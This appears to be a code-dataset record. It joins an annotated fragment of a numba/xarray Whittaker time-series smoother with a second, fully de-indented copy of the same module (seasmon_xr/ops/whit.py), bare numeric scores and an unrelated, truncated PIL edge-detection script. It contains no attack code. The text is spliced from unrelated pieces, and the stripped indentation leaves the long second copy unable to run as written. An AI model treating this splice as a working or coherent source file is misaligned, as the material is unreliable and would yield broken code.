        p1 = 1 - p  # weight for points on/below the current fit
        fits = numpy.zeros(nl)   # log weighted residual sum per candidate
        pens = numpy.zeros(nl)   # log 2nd-difference penalty per candidate
        z = numpy.zeros(m)
        znew = numpy.zeros(m)
        diff1 = numpy.zeros(m1)  # scratch: 1st differences of the fit
        lamids = numpy.zeros(nl1)
        v = numpy.zeros(nl1)
        wa = numpy.zeros(m)      # asymmetric weight factors
        ww = numpy.zeros(m)      # combined weights w * wa
        # Compute v-curve
        # NOTE(review): z is not reset between candidates, so each
        # candidate's reweighting loop starts from the previous
        # candidate's fit — confirm this warm start is intentional.
        for lix in range(nl):
            lmda = pow(10, llas[lix])
            # Asymmetric reweighting loop (at most 10 iterations).
            for i in range(10):
                for j in range(m):
                    y_tmp = y[j]
                    z_tmp = z[j]
                    if y_tmp > z_tmp:
                        wa[j] = p
                    else:
                        wa[j] = p1
                    ww[j] = w[j] * wa[j]
                znew[:] = ws2d(y, lmda, ww)
                # L1 change between successive fits; zero means converged.
                z_tmp = 0.0
                j = 0
                for j in range(m):
                    z_tmp += abs(znew[j] - z[j])
                if z_tmp == 0.0:
                    break
                z[0:m] = znew[0:m]
            # Weighted sum of squared residuals (log scale).
            for i in range(m):
                w_tmp = w[i]
                y_tmp = y[i]
                z_tmp = z[i]
                fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
            fits[lix] = log(fits[lix])
            # Roughness: sum of squared 2nd differences (log scale).
            for i in range(m1):
                z_tmp = z[i]
                z2 = z[i + 1]
                diff1[i] = z2 - z_tmp
            for i in range(m2):
                z_tmp = diff1[i]
                z2 = diff1[i + 1]
                pens[lix] += pow(z2 - z_tmp, 2)
            pens[lix] = log(pens[lix])
        # Construct v-curve
        llastep = llas[1] - llas[0]
        # Segment length in (fit, penalty) space per unit lambda,
        # evaluated at the midpoint of each candidate interval.
        for i in range(nl1):
            l1 = llas[i]
            l2 = llas[i + 1]
            fit1 = fits[i]
            fit2 = fits[i + 1]
            pen1 = pens[i]
            pen2 = pens[i + 1]
            v[i] = sqrt(pow(fit2 - fit1, 2) + pow(pen2 - pen1, 2)) / (log(10) * llastep)
            lamids[i] = (l1 + l2) / 2
        # Locate the V-curve minimum (linear scan, first minimum wins ties).
        vmin = v[k]
        for i in range(1, nl1):
            if v[i] < vmin:
                vmin = v[i]
                k = i
        lopt[0] = pow(10, lamids[k])
        # Rerun the asymmetric smooth from scratch at the optimized S.
        z[:] = 0.0
        for i in range(10):
            for j in range(m):
                y_tmp = y[j]
                z_tmp = z[j]
                if y_tmp > z_tmp:
                    wa[j] = p
                else:
                    wa[j] = p1
                ww[j] = w[j] * wa[j]
            znew[0:m] = ws2d(y, lopt[0], ww)
            z_tmp = 0.0
            j = 0
            for j in range(m):
                z_tmp += abs(znew[j] - z[j])
            if z_tmp == 0.0:
                break
            z[0:m] = znew[0:m]
        # Final smooth with the last weight vector (matches loop above).
        z = ws2d(y, lopt[0], ww)
        numpy.round_(z, 0, out)
    else:
        # Not enough data points to smooth — pass through, flag S as 0.
        out[:] = y[:]
        lopt[0] = 0.0
@guvectorize(
[(int16[:], float64, float64, float64, int16[:], float64[:])],
"(n),(),(),() -> (n),()",
nopython=True,
)
def ws2doptvplc(y, nodata, p, lc, out, lopt):
"""
Whittaker filter V-curve optimization.
Whittaker filter V-curve optimization of S, asymmetric weights and
srange determined by autocorrelation.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
p (float): Envelope value for asymmetric weights
lc (float): lag1 autocorrelation
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
if lc > 0.5:
llas = numpy.arange(-2, 1.2, 0.2, dtype=float64)
elif lc <= 0.5:
llas = numpy.arange(0, 3.2, 0.2, dtype=float64)
else:
llas = numpy.arange(-1, 1.2, 0.2, dtype=float64)
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
j = 0
p1 = 1 - p
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
znew = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
fit1 = fits[i]
fit2 = fits[i + 1]
pen1 = pens[i]
pen2 = pens[i + 1]
v[i] = sqrt(pow(fit2 - fit1, 2) + pow(pen2 - pen1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z[:] = 0.0
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[0:m] = ws2d(y, lopt[0], ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
z = ws2d(y, lopt[0], ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
def whits(
ds: xarray.Dataset,
dim: str,
nodata: Union[int, float],
sg: xarray.DataArray = None,
s: float = None,
p: float = None,
) -> xarray.Dataset:
"""
Apply whittaker with fixed S.
Fixed S can be either provided as constant or
as sgrid with a constant per pixel
Args:
ds: input dataset,
dim: dimension to use for filtering
nodata: nodata value
sg: sgrid,
s: S value
p: Envelope value for asymmetric weights
Returns:
ds_out: xarray.Dataset with smoothed data
"""
if sg is None and s is None:
raise ValueError("Need S or sgrid")
lmda = sg if sg is not None else s
if p is not None:
xout = xarray.apply_ufunc(
ws2dpgu,
ds[dim],
lmda,
nodata,
p,
input_core_dims=[["time"], [], [], []],
output_core_dims=[["time"]],
dask="parallelized",
keep_attrs=True,
)
else:
xout = xarray.apply_ufunc(
ws2dgu,
ds[dim],
lmda,
nodata,
input_core_dims=[["time"], [], []],
output_core_dims=[["time"]],
dask="parallelized",
keep_attrs=True,
)
return xout
def whitsvc(
ds: xarray.Dataset,
dim: str,
nodata: Union[int, float],
lc: xarray.DataArray = None,
srange: numpy.ndarray = None,
p: float = None,
) -> xarray.Dataset:
"""
Apply whittaker with V-curve optimization of S.
Args:
ds: input dataset,
dim: dimension to use for filtering
nodata: nodata value
lc: lag1 autocorrelation DataArray,
srange: values of S for V-curve optimization (mandatory if no autocorrelation raster)
p: Envelope value for asymmetric weights
Returns:
ds_out: xarray.Dataset with smoothed data and sgrid
"""
if lc is not None:
if p is None:
raise ValueError("If lc is set, a p value needs to be specified as well.")
ds_out, sgrid = xarray.apply_ufunc(
ws2doptvplc,
ds[dim],
nodata,
p,
lc,
input_core_dims=[["time"], [], [], []],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
else:
if srange is None:
raise ValueError("Need either lagcorr or srange!")
if p:
ds_out, sgrid = xarray.apply_ufunc(
ws2doptvp,
ds[dim],
nodata,
p,
srange,
input_core_dims=[["time"], [], [], ["dim0"]],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
else:
ds_out, sgrid = xarray.apply_ufunc(
ws2doptv,
ds[dim],
nodata,
srange,
input_core_dims=[["time"], [], ["dim0"]],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
ds_out = ds_out.to_dataset()
ds_out["sgrid"] = numpy.log10(sgrid).astype("float32")
return ds_out
def whitint(
ds: xarray.Dataset, dim: str, labels_daily: numpy.ndarray, template: numpy.ndarray
):
"""Perform temporal interpolation using the Whittaker filter."""
template_out = numpy.zeros(numpy.unique(labels_daily).size, dtype="u1")
ds_out = xarray.apply_ufunc(
tinterpolate,
ds[dim],
template,
labels_daily,
template_out,
input_core_dims=[["time"], ["dim0"], ["dim1"], ["dim2"]],
output_core_dims=[["newtime"]],
dask_gufunc_kwargs={"output_sizes": {"newtime": template_out.size}},
output_dtypes=["int16"],
dask="parallelized",
keep_attrs=True,
)
return ds_out
@njit
def autocorr(x):
"""
Calculate Lag-1 autocorrelation.
Adapted from https://stackoverflow.com/a/29194624/5997555
Args:
x: 3d data array
Returns:
Lag-1 autocorrelation array
"""
r, c, t = x.shape
z = numpy.zeros((r, c), dtype="float32")
M = t - 1
for rr in range(r):
for cc in range(c):
data1 = x[rr, cc, 1:]
data2 = x[rr, cc, :-1]
sum1 = 0.0
sum2 = 0.0
for i in range(M):
sum1 += data1[i]
sum2 += data2[i]
mean1 = sum1 / M
mean2 = sum2 / M
var_sum1 = 0.0
var_sum2 = 0.0
cross_sum = 0.0
for i in range(M):
var_sum1 += (data1[i] - mean1) ** 2
var_sum2 += (data2[i] - mean2) ** 2
cross_sum += data1[i] * data2[i]
std1 = (var_sum1 / M) ** 0.5
std2 = (var_sum2 / M) ** 0.5
cross_mean = cross_sum / M
if std1 != 0 and std2 != 0:
lc = (cross_mean - mean1 * mean2) / (std1 * std2)
else:
lc = 0.0
z[rr, cc] = lc
return z
def lag1corr(ds: xarray.Dataset, dim: str):
"""
Xarray wrapper for autocorr.
Args:
ds: input dataset,
dim: dimension to use for calculation
Returns:
xarray.DataArray with lag1 autocorrelation
"""
return xarray.apply_ufunc(
autocorr,
ds[dim],
input_core_dims=[["time"]],
dask="parallelized",
output_dtypes=["float32"],
)
@guvectorize(
[(int16[:], float64[:], int32[:], uint8[:], int16[:])],
"(n),(m),(m),(l) -> (l)",
nopython=True,
)
def tinterpolate(x, template, labels, template_out, out): # pylint: disable=W0613
"""
Temporal interpolation of smoothed data.
Args:
x: smoothed data
template: zeros array in daily length with 1s marking smoothed data
labels: array of labels for grouping of length equal to template
template_out: helper array to determine the length of output array
"""
temp = template.copy()
w = template.copy()
ii = 0
jj = 0
for tt in temp:
if tt != 0:
temp[ii] = x[jj]
jj += 1
ii += 1
temp[-1] = x[-1]
z = ws2d(temp, 0.00001, w)
ii = 1
jj = 1
kk = 0
v = z[0]
for ll in labels[1:]:
if ll == labels[ii - 1]:
v += z[ii]
jj += 1
else:
out[kk] = round(v / jj)
kk += 1
jj = 1
v = z[ii]
ii += 1
out[kk] = round(v / jj) | seasmon_xr/ops/whit.py | # pyright: reportGeneralTypeIssues=false
# pylint: disable=C0103,C0301,E0401,R0912,R0913,R0914,R0915
from math import log, pow, sqrt # pylint: disable=W0622
from typing import Union
import numpy
import xarray
from numba import guvectorize, njit
from numba.core.types import float64, int16, int32, uint8
@njit
def ws2d(y, lmda, w):
"""
Whittaker filter with differences of 2nd order.
Args:
y (numpy.array): raw data array (1d, expected in float64)
lmda (double): S value
w (numpy.array): weights vector (1d, expected in float64)
Returns:
z (numpy.array): smoothed data array (1d)
"""
n = y.shape[0]
m = n - 1
z = numpy.zeros(n)
d = z.copy()
c = z.copy()
e = z.copy()
d[0] = w[0] + lmda
c[0] = (-2 * lmda) / d[0]
e[0] = lmda / d[0]
z[0] = w[0] * y[0]
d[1] = w[1] + 5 * lmda - d[0] * (c[0] * c[0])
c[1] = (-4 * lmda - d[0] * c[0] * e[0]) / d[1]
e[1] = lmda / d[1]
z[1] = w[1] * y[1] - c[0] * z[0]
for i in range(2, m - 1):
i1 = i - 1
i2 = i - 2
d[i] = w[i] + 6 * lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
c[i] = (-4 * lmda - d[i1] * c[i1] * e[i1]) / d[i]
e[i] = lmda / d[i]
z[i] = w[i] * y[i] - c[i1] * z[i1] - e[i2] * z[i2]
i1 = m - 2
i2 = m - 3
d[m - 1] = w[m - 1] + 5 * lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
c[m - 1] = (-2 * lmda - d[i1] * c[i1] * e[i1]) / d[m - 1]
z[m - 1] = w[m - 1] * y[m - 1] - c[i1] * z[i1] - e[i2] * z[i2]
i1 = m - 1
i2 = m - 2
d[m] = w[m] + lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
z[m] = (w[m] * y[m] - c[i1] * z[i1] - e[i2] * z[i2]) / d[m]
z[m - 1] = z[m - 1] / d[m - 1] - c[m - 1] * z[m]
for i in range(m - 2, -1, -1):
z[i] = z[i] / d[i] - c[i] * z[i + 1] - e[i] * z[i + 2]
return z
@guvectorize(
[(float64[:], float64, float64, int16[:])], "(n),(),() -> (n)", nopython=True
)
def ws2dgu(y, lmda, nodata, out):
"""
Whittaker smoother with fixed lambda (S).
Args:
y: time-series numpy array
l: smoothing parameter lambda (S)
w: weights numpy array
p: "Envelope" value
Returns:
Smoothed time-series array z
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
z = ws2d(y, lmda, w)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
@guvectorize(
[(float64[:], float64, float64, float64, int16[:])],
"(n),(),(),() -> (n)",
nopython=True,
)
def ws2dpgu(y, lmda, nodata, p, out):
"""
Whittaker smoother with asymmetric smoothing and fixed lambda (S).
Args:
y: time-series numpy array
l: smoothing parameter lambda (S)
w: weights numpy array
p: "Envelope" value
Returns:
Smoothed time-series array z
"""
w = numpy.zeros(y.shape, dtype=float64)
m = y.shape[0]
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
p1 = 1 - p
z = numpy.zeros(m)
znew = numpy.zeros(m)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Calculate weights
for _ in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[:] = znew[:]
z = ws2d(y, lmda, ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
@guvectorize(
[(float64[:], float64, float64[:], int16[:], float64[:])],
"(n),(),(m) -> (n),()",
nopython=True,
)
def ws2doptv(y, nodata, llas, out, lopt):
"""
Whittaker filter V-curve optimization of S.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
llas (numpy.array): 1d array of s values to use for optimization
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
z[:] = ws2d(y, lmda, w)
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
f1 = fits[i]
f2 = fits[i + 1]
p1 = pens[i]
p2 = pens[i + 1]
v[i] = sqrt(pow(f2 - f1, 2) + pow(p2 - p1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z = ws2d(y, lopt[0], w)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
@guvectorize(
[(float64[:], float64, float64, float64[:], int16[:], float64[:])],
"(n),(),(),(m) -> (n),()",
nopython=True,
)
def ws2doptvp(y, nodata, p, llas, out, lopt):
"""
Whittaker filter V-curve optimization of S and asymmetric weights.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
p (float): Envelope value for asymmetric weights
llas (numpy.array): 1d array of s values to use for optimization
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
j = 0
p1 = 1 - p
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
znew = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
fit1 = fits[i]
fit2 = fits[i + 1]
pen1 = pens[i]
pen2 = pens[i + 1]
v[i] = sqrt(pow(fit2 - fit1, 2) + pow(pen2 - pen1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z[:] = 0.0
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[0:m] = ws2d(y, lopt[0], ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
z = ws2d(y, lopt[0], ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
@guvectorize(
[(int16[:], float64, float64, float64, int16[:], float64[:])],
"(n),(),(),() -> (n),()",
nopython=True,
)
def ws2doptvplc(y, nodata, p, lc, out, lopt):
"""
Whittaker filter V-curve optimization.
Whittaker filter V-curve optimization of S, asymmetric weights and
srange determined by autocorrelation.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
p (float): Envelope value for asymmetric weights
lc (float): lag1 autocorrelation
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
if lc > 0.5:
llas = numpy.arange(-2, 1.2, 0.2, dtype=float64)
elif lc <= 0.5:
llas = numpy.arange(0, 3.2, 0.2, dtype=float64)
else:
llas = numpy.arange(-1, 1.2, 0.2, dtype=float64)
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
j = 0
p1 = 1 - p
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
znew = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
fit1 = fits[i]
fit2 = fits[i + 1]
pen1 = pens[i]
pen2 = pens[i + 1]
v[i] = sqrt(pow(fit2 - fit1, 2) + pow(pen2 - pen1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z[:] = 0.0
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[0:m] = ws2d(y, lopt[0], ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
z = ws2d(y, lopt[0], ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
def whits(
ds: xarray.Dataset,
dim: str,
nodata: Union[int, float],
sg: xarray.DataArray = None,
s: float = None,
p: float = None,
) -> xarray.Dataset:
"""
Apply whittaker with fixed S.
Fixed S can be either provided as constant or
as sgrid with a constant per pixel
Args:
ds: input dataset,
dim: dimension to use for filtering
nodata: nodata value
sg: sgrid,
s: S value
p: Envelope value for asymmetric weights
Returns:
ds_out: xarray.Dataset with smoothed data
"""
if sg is None and s is None:
raise ValueError("Need S or sgrid")
lmda = sg if sg is not None else s
if p is not None:
xout = xarray.apply_ufunc(
ws2dpgu,
ds[dim],
lmda,
nodata,
p,
input_core_dims=[["time"], [], [], []],
output_core_dims=[["time"]],
dask="parallelized",
keep_attrs=True,
)
else:
xout = xarray.apply_ufunc(
ws2dgu,
ds[dim],
lmda,
nodata,
input_core_dims=[["time"], [], []],
output_core_dims=[["time"]],
dask="parallelized",
keep_attrs=True,
)
return xout
def whitsvc(
ds: xarray.Dataset,
dim: str,
nodata: Union[int, float],
lc: xarray.DataArray = None,
srange: numpy.ndarray = None,
p: float = None,
) -> xarray.Dataset:
"""
Apply whittaker with V-curve optimization of S.
Args:
ds: input dataset,
dim: dimension to use for filtering
nodata: nodata value
lc: lag1 autocorrelation DataArray,
srange: values of S for V-curve optimization (mandatory if no autocorrelation raster)
p: Envelope value for asymmetric weights
Returns:
ds_out: xarray.Dataset with smoothed data and sgrid
"""
if lc is not None:
if p is None:
raise ValueError("If lc is set, a p value needs to be specified as well.")
ds_out, sgrid = xarray.apply_ufunc(
ws2doptvplc,
ds[dim],
nodata,
p,
lc,
input_core_dims=[["time"], [], [], []],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
else:
if srange is None:
raise ValueError("Need either lagcorr or srange!")
if p:
ds_out, sgrid = xarray.apply_ufunc(
ws2doptvp,
ds[dim],
nodata,
p,
srange,
input_core_dims=[["time"], [], [], ["dim0"]],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
else:
ds_out, sgrid = xarray.apply_ufunc(
ws2doptv,
ds[dim],
nodata,
srange,
input_core_dims=[["time"], [], ["dim0"]],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
ds_out = ds_out.to_dataset()
ds_out["sgrid"] = numpy.log10(sgrid).astype("float32")
return ds_out
def whitint(
ds: xarray.Dataset, dim: str, labels_daily: numpy.ndarray, template: numpy.ndarray
):
"""Perform temporal interpolation using the Whittaker filter."""
template_out = numpy.zeros(numpy.unique(labels_daily).size, dtype="u1")
ds_out = xarray.apply_ufunc(
tinterpolate,
ds[dim],
template,
labels_daily,
template_out,
input_core_dims=[["time"], ["dim0"], ["dim1"], ["dim2"]],
output_core_dims=[["newtime"]],
dask_gufunc_kwargs={"output_sizes": {"newtime": template_out.size}},
output_dtypes=["int16"],
dask="parallelized",
keep_attrs=True,
)
return ds_out
@njit
def autocorr(x):
"""
Calculate Lag-1 autocorrelation.
Adapted from https://stackoverflow.com/a/29194624/5997555
Args:
x: 3d data array
Returns:
Lag-1 autocorrelation array
"""
r, c, t = x.shape
z = numpy.zeros((r, c), dtype="float32")
M = t - 1
for rr in range(r):
for cc in range(c):
data1 = x[rr, cc, 1:]
data2 = x[rr, cc, :-1]
sum1 = 0.0
sum2 = 0.0
for i in range(M):
sum1 += data1[i]
sum2 += data2[i]
mean1 = sum1 / M
mean2 = sum2 / M
var_sum1 = 0.0
var_sum2 = 0.0
cross_sum = 0.0
for i in range(M):
var_sum1 += (data1[i] - mean1) ** 2
var_sum2 += (data2[i] - mean2) ** 2
cross_sum += data1[i] * data2[i]
std1 = (var_sum1 / M) ** 0.5
std2 = (var_sum2 / M) ** 0.5
cross_mean = cross_sum / M
if std1 != 0 and std2 != 0:
lc = (cross_mean - mean1 * mean2) / (std1 * std2)
else:
lc = 0.0
z[rr, cc] = lc
return z
def lag1corr(ds: xarray.Dataset, dim: str):
"""
Xarray wrapper for autocorr.
Args:
ds: input dataset,
dim: dimension to use for calculation
Returns:
xarray.DataArray with lag1 autocorrelation
"""
return xarray.apply_ufunc(
autocorr,
ds[dim],
input_core_dims=[["time"]],
dask="parallelized",
output_dtypes=["float32"],
)
@guvectorize(
[(int16[:], float64[:], int32[:], uint8[:], int16[:])],
"(n),(m),(m),(l) -> (l)",
nopython=True,
)
def tinterpolate(x, template, labels, template_out, out): # pylint: disable=W0613
"""
Temporal interpolation of smoothed data.
Args:
x: smoothed data
template: zeros array in daily length with 1s marking smoothed data
labels: array of labels for grouping of length equal to template
template_out: helper array to determine the length of output array
"""
temp = template.copy()
w = template.copy()
ii = 0
jj = 0
for tt in temp:
if tt != 0:
temp[ii] = x[jj]
jj += 1
ii += 1
temp[-1] = x[-1]
z = ws2d(temp, 0.00001, w)
ii = 1
jj = 1
kk = 0
v = z[0]
for ll in labels[1:]:
if ll == labels[ii - 1]:
v += z[ii]
jj += 1
else:
out[kk] = round(v / jj)
kk += 1
jj = 1
v = z[ii]
ii += 1
out[kk] = round(v / jj) | 0.741768 | 0.474814 |
from PIL import Image
BLACK = (0,0,0)
WHITE = (255,255,255)
GREEN = (0,255,0)
RED = (255,0,0)
BLUE = (0,0,255)
"""
prcessImage - colors the edges of the image and saves it to the 'result' folder
@ARGS
path (utf string) - the path of the original image [ default - path to sample image ]
Mu (int) - we define the intensity with the 'mu' so if we set it higher it will only pick drastic changes [ default - 20 the optimal value ]
"""
def prcessImage( path = './sample-images/jpeg-home.jpeg', Mu = 20 ):
## We get the image and the load the pixels from it
im = Image.open(path) # Can be many different formats.
pix = im.load()
## Getting my image sizes
width = im.size[0]
height = im.size[1]
## Running from top to bottom of the image and changing the color of out picture to show predicted edges
for x in range(1,width-1):
for y in range(1,height-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][1] - pix[x,y+1][1]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][2] - pix[x,y+1][2]) > Mu:
pix[x,y] = GREEN
## Running from left to right of the image and changing the color of out picture to show predicted edges
for y in range(1,height-1):
for x in range(1,width-1):
if abs(pix[x,y][0] - pix[x+1,y][0]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][1] - pix[x+1,y][1]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][2] - pix[x+1,y][2]) > Mu:
pix[x,y] = GREEN
## Saving the image so it can be loaded from main window
im.save('./result/result.jpg')
'''
exit() #Exit the program so the second method is not effecting
count = 0
avarageChangeR = 0
avarageChangeG = 0
avarageChangeB = 0
avarageChange = 0
changeArrey = []
for x in range(1,width-1):
for y in range(1,height-1):
count += 1
avarageChangeR += abs(pix[x,y][0] - pix[x,y+1][0])
avarageChangeG += abs(pix[x,y][1] - pix[x,y+1][1])
avarageChangeB += abs(pix[x,y][2] - pix[x,y+1][2])
